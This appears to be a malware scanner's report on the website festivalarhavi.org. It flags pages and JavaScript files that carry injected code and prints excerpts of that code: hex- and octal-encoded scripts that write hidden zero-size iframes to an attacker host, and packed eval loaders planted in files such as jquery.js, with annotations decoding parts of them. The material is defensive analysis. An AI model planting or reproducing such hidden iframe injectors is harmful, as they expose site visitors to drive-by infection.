Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=festivalarhavi.org
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://festivalarhavi.org/ | 200 OK Content-Length: 5931 Content-Type: text/html | malicious |
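Malicious code found. Script contains blacklisted domain: private3.zapto.org
var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62c ...[1839 bytes skipped]...
Note: the variable holds hex byte values separated by the filler token cNRoPJdqz. The visible prefix (3c 69 66 72 61 6d 65 20 73 72 63 ...) spells <iframe src="http://private3.zapto.org/b, which is consistent with the decoded output below. Presumably the skipped part replaces the filler with % before calling unescape(); that code is not shown in this excerpt. The resulting iframe has width and height 0 and no border, so the third-party page loads with nothing visible to the visitor.
Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> | ||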
http://festivalarhavi.org/js/domover.js | 200 OK Content-Length: 16018 Content-Type: application/x-javascript | malicious |
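Malicious code, confirmed by antivirus engines (see below): eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B N(f){q.2D=B(a,b){p c=\'\';1J(p i=0;i<b.J;i++){c+=G.E(a.W(i%a.J)^b.W(i))}M c};q.Q=B(h){H(h.D(\':\'))h=h.U(\':\')[0];p a=h.U(\'.\');T(a.J>2){a.1n()}M a.1m(\'.\')}
Note: the eval(function(p,a,c,k,e,r){...}) wrapper is a widely used JavaScript packer that also appears in legitimate minified scripts, so the wrapper alone is not an indicator; the verdict rests on the unpacked payload and the antivirus detections. The visible start of the payload has the shape of a repeating-key XOR routine (a.W(i%a.J)^b.W(i)) followed by a helper that appears to trim a hostname to its last two labels. The packer's keyword table is cut off here, so that reading is an inference. The same packed structure appears in the js/jquery.js and js/interface.js entries below. No engine names or detection labels follow "Antivirus reports:" in this copy.
Antivirus reports: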
| ||
http://festivalarhavi.org/js/jquery.js | 200 OK Content-Length: 12120 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('y N(f){v.2O=y(a,b){q c=\'\';2M(q i=0;i<b.F;i++){c+=I.G(a.17(i%a.F)^b.17(i))}H c};v.S=y(h){J(h.B(\':\'))h=h.W(\':\')[0];q a=h.W(\'.\');X(a.F>2){a.2L()}H a.2K(\'.\' Antivirus reports:
| ||
http://festivalarhavi.org/js/interface.js | 200 OK Content-Length: 15880 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C N(f){v.1w=C(a,b){q c=\'\';1v(q i=0;i<b.I;i++){c+=H.F(a.T(i%a.I)^b.T(i))}J c};v.X=C(h){D(h.y(\':\'))h=h.U(\':\')[0];q a=h.U(\'.\');Z(a.I>2){a.1X()}J a.1r(\'.\')} Antivirus reports:
| ||
http://festivalarhavi.org/anit_Fest/ | 200 OK Content-Length: 15703 Content-Type: text/html | malicious |
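Malicious code, confirmed by antivirus engines (see below): ps="sp"+"li"+"t";asd=function(){d.body++};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,14
Note: the visible numbers, read as octal character codes and reduced by 4, spell (whitespace omitted) if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://www.pufuq before the excerpt is cut off. This is another script-written iframe. The decoding routine and the full address are not shown in this copy, and no engine names follow "Antivirus reports:".
Antivirus reports: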
| ||
http://festivalarhavi.org/anit_Fest/js/domover.js | 200 OK Content-Length: 4748 Content-Type: application/x-javascript | clean |
http://festivalarhavi.org/anit_Fest/default.asp | 200 OK Content-Length: 15703 Content-Type: text/html | malicious |
Malicious code, confirmed by antivirus engines (see below): ps="sp"+"li"+"t";asd=function(){d.body++};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,14
Note: this entry has the same Content-Length (15703) and the same script excerpt as the http://festivalarhavi.org/anit_Fest/ entry above, so it is most likely the directory's default document reached under a second URL rather than a separate infection.
Antivirus reports:
| ||
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=3 | 200 OK Content-Length: 6751 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=3&duyurubaslik=Sponsorlar | 200 OK Content-Length: 6751 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=4 | 200 OK Content-Length: 6737 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/basin_odasi.asp?page=default | 200 OK Content-Length: 7721 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=5 | 200 OK Content-Length: 8207 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=2 | 200 OK Content-Length: 7764 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/festival_ekibi.asp?page=default | 200 OK Content-Length: 8778 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=7 | 200 OK Content-Length: 8360 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: festivalarhavi.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 14 Dec 2014 00:39:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 5931
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSDBC=AIBHBOGCFJLBHNPEFGDMHABG; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...5931 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: festivalarhavi.org
Referer: http://www.google.com/search?q=festivalarhavi.org
Result:
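The response is similar to the first query; no suspicious redirects were found. This check varies only the Referer header, so it does not rule out content that is served conditionally on other request properties such as User-Agent, cookies or client address. The absence of a redirect also does not clear the page: the 5931-byte response returned here has the same length as the home page flagged above for the hidden iframe.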